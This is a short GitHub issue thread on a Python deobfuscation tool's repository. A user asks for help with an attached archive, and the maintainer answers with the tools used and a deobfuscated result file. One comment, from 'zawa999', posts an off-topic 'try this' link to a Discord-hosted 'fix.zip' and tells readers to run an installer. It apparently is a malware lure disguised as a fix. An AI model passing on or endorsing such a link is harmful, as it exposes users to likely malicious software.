### ISSUE TITLE
giup minh voi

### ISSUE THREAD

**Issue by meopeongokngheck** [KhanhNguyen9872/deobf_pyobfuscate.com#13]
[File.zip](https://github.com/user-attachments/files/16843930/File.zip)

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by KhanhNguyen9872** [comment]
> [File.zip](https://github.com/user-attachments/files/16843930/File.zip)

- `yes.py` -> using old deobf_pyobfuscate [here](https://github.com/KhanhNguyen9872/deobf_pyobfuscate.com/blob/e7c93712a337c99936ba6479722e0261ab0b7913/pyd_pyobf_deobf.py)
- `autorj` -> using hyperion_deobf (with option `Deobf all first layer` and check layer_48) [here](https://github.com/KhanhNguyen9872/hyperion_deobfuscate)


=> Result: [File.zip](https://github.com/user-attachments/files/16845626/File.zip)
